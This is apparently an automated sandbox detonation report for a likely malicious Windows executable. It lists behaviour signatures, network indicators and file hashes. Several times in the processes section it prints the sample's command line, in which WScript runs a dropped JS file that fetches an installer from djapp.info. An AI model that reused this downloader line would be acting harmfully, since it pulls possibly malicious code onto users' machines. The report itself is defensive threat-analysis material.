Analysis Overview
SHA256
065183bc01f4117eea2408f6625a9b0d238fec9f251d2538b02abaacd2cf7106
Threat Level: Likely malicious
The file 742be332927d3c9215c11e47cefd0e51_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Unsigned PE
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-26 03:17
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 03:17
Reported
2024-05-26 03:20
Platform
win7-20240215-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf1130.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm
| MD5 | 4111118421f57b050e46ceccf8b6ced0 |
| SHA1 | 76d92b74fbf5f6c1d39d97a96a8d71ddacd5ad3c |
| SHA256 | 34f0d697d6eb41be89e722c651e9a0ecf00307f64969388b164fdcdd8038dfa8 |
| SHA512 | f59b0a141a5020683a9850477a07b183ec40792f01b8d6be6fe92d54bc47b9d3a137a552dbb6a4db0e74e19389257d4d367f963a4552fa64b4f68181daa3493a |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\PPA2MUFY.txt
| MD5 | aace5e9bfbc63533e58680ab3e35717e |
| SHA1 | 6eb451ad9a44b0ac552891a88b7f9bf3b194cc2a |
| SHA256 | dc05c230bd0c5fefebbd9e3c121fa4ad611e3bf5aa344e570d9fa7ad61fda3e5 |
| SHA512 | c2813c67e03f374b48c6eb2f737cb5b6bcf7025a3b8a061ab10e4bb423755cbfd77d3fce17c4f44a57f892891959a1bf9957239ee43eb119c9c7ded3c487af35 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1dc7afbaabfb27af8ce2ce784ee375e8 |
| SHA1 | 3ab47a21e10ed815f7d6a74e03337886976537ac |
| SHA256 | 31d9ffc822d6c77e6665a1d97a416a2602a9e1e775f32ade75ecc3eee3557c9e |
| SHA512 | 895a778711bc16573215e3293f3aa21bda52c1599cb3719b520bdf9053e00d8f2b2e2058bf4ee97c1693e4b79d7103f666e06b96f143aece19320eb2e45dc5f4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | f42a12f1f39fc7b984c8aff5dc07cbe7 |
| SHA1 | b76b8cd52a1a4add8f504fd2310c34d0a7157754 |
| SHA256 | 2d043bb14d90baa75356a46ef039c8f5b975d6ad2317040bb686f69514ddd0a7 |
| SHA512 | 10a68fb9b8361bd764c7a7b5cced12c15bdab34137b0d40e5bbf8ef56e9c95785e5db7b70e6a48d9e5efce26c4aebb02181075a5a28a65da799864d806e03b62 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | dd3850d9ce5a33ba453ba4d1dfb4ba51 |
| SHA1 | df05b044dd14e7d009aad0398686bbfd6fff1491 |
| SHA256 | e9e041a83d7f3dbd6adfeda50b7ff9d3fd1abfcfb4fc5906d481c33db7072b85 |
| SHA512 | ec27ccc61d0133a76a612d5ddde2c6193f96302e17f66a75da8e1ad18ee871fe6b307e535317726449dc724331d4f48376d03201ad8d9dc2985aa0420d45b8e4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 69e8173ede06b40a095a6207332d260c |
| SHA1 | c2749497e8506e99a085d1a7f4a80fa2235d4fcb |
| SHA256 | 7c505b7e44fe709d6b9e55e1a5d09025cd3962a169be97acceb82929ee894e81 |
| SHA512 | 9b4df2d82d0908a12d35190b14374887077c98255963d3b899cf40bf067591c9d4420ee5ee28b075edd878bd52fd6c164ea8f4c9003fc1fb35715131d9613c7a |
C:\Users\Admin\AppData\Local\Temp\Cab405A.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm
| MD5 | 9f2bc8cac28bc3b78936c1715e6b404a |
| SHA1 | 569dc5054683f2cac6fa4fd2819e2553f51c5b02 |
| SHA256 | 8051ca3b8366cf7884f9c88cbb4a9605e0c189b4f2d7eb6a48cfde8f9f457b88 |
| SHA512 | b24d6a99966e5d2c355420e03d5e5c601fafc4c70a68edb6158a8b948e7e1993a35a03ff2101b007eac247c2de8732621ea656907571a530054477357748f44d |
C:\Users\Admin\AppData\Local\Temp\Tar58CB.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm
| MD5 | cd853adc85a57676032ca5b5b534eb55 |
| SHA1 | a896642fb6a2ffee080bf03eb68944f746a56801 |
| SHA256 | 04cba2319204665ddc2b3927c8869b555ca8f4f85d673e2940c80ab0b810f0bf |
| SHA512 | f9cdd008e4955902f2241cf30ecc5843da88e3e2f6577c8e882fa264f1691b21aeab3fe9cd83f442c4e544a6fee17e6ebf6e333d0f7a012eb73b1a8da9594b41 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm
| MD5 | 63dec8725452b8b20569682997eea84f |
| SHA1 | 9ab34d2f2a58212c7618b8248abbb843c554037c |
| SHA256 | 221ebeba1fb201dbceb1258da93f159cdff75ff3e4bd1c77f09ab64410212a70 |
| SHA512 | 35228957e0c0867629afb473846b7c405416e02f2b65e87853909b8b96458cefd2b9d373ab3109c16005c70581741e136771c24ba3c3324a02a6b769c169c695 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-26 03:17
Reported
2024-05-26 03:20
Platform
win10v2004-20240426-en
Max time kernel
136s
Max time network
105s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3354.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3354.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3354.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3354.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3354.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3354.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3354.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3354.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3354.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3354.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.154.119.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 34.205.242.146:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | 146.242.205.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf3354.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |